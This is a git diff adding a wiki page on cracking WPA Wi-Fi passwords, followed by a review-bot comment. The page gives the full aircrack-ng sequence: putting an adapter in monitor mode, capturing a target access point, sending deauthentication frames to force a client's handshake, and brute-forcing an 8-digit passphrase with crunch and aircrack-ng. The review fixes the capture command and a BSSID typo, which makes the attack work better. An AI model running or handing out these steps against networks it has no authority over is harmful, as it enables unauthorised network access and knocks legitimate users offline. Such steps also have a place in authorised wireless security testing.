diff --git a/HowtoCrackWPA.page b/HowtoCrackWPA.page new file mode 100644 index 0000000..57d9763 --- /dev/null +++ b/HowtoCrackWPA.page @@ -0,0 +1,39 @@ +# Monitor mode +For my RTL8188EUS: + +``` +ip link set wlanX down +iw dev wlanX set type monitor +``` + +# Scan networks + +All channels: +``` +airodump-ng wlanX +``` +Specific channel: +``` +airodump-ng -c 6 wlanX +``` + +# Save a capture of chosen BSSID + +``` +airodump-ng -c 6 --bssid 00:23:B1:82:08:xx -w wlanX +``` + +You need to wait for a client to connect, or to deauth it and get the 4-way handshake. +``` +aireplay-ng -0 1 -a 00:23:B1:82:0C:xx -c D0:37:45:2F:52:xx wlanX +``` +`-a` is access point +`-c` is client + +Then you should have an EAPOL/WPA handshake. + +# Crack WPA passphrase + +## For a 8 digits scheme + +crunch 8 8 0123456789 -s 00000000 | aircrack-ng -w - -b 00:23:B1:82:08:xx .cap
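Review bot: the capture command in the "Save a capture of chosen BSSID" section is wrong: `-w` takes an output file prefix, not the interface, so `airodump-ng -c 6 --bssid 00:23:B1:82:08:xx -w wlanX` writes files named `wlanX-01.cap` and has no interface argument at all. It should read `airodump-ng -c 6 --bssid 00:23:B1:82:08:xx -w capture wlanX` (or whatever prefix you prefer), and the final aircrack-ng line should then name that file (`capture-01.cap`) instead of the bare `.cap` placeholder. Two smaller consistency issues in the same hunk: the BSSID used with aireplay-ng (`00:23:B1:82:0C:xx`) differs from the one used with airodump-ng and aircrack-ng (`00:23:B1:82:08:xx`), which looks like a typo since all three commands should target the same access point; and the monitor-mode section brings the interface down and changes its type but never brings it back up, so an `ip link set wlanX up` after `iw dev wlanX set type monitor` is missing. It would also help the reader to mention how to confirm the handshake was captured before spending time on cracking, e.g. by running `aircrack-ng capture-01.cap` without a wordlist and checking that the target network is listed with "WPA (1 handshake)"; the airodump-ng status line "WPA handshake: <BSSID>" appears only while the capture is running. Finally, the last command is not wrapped in a code fence like the others in the page.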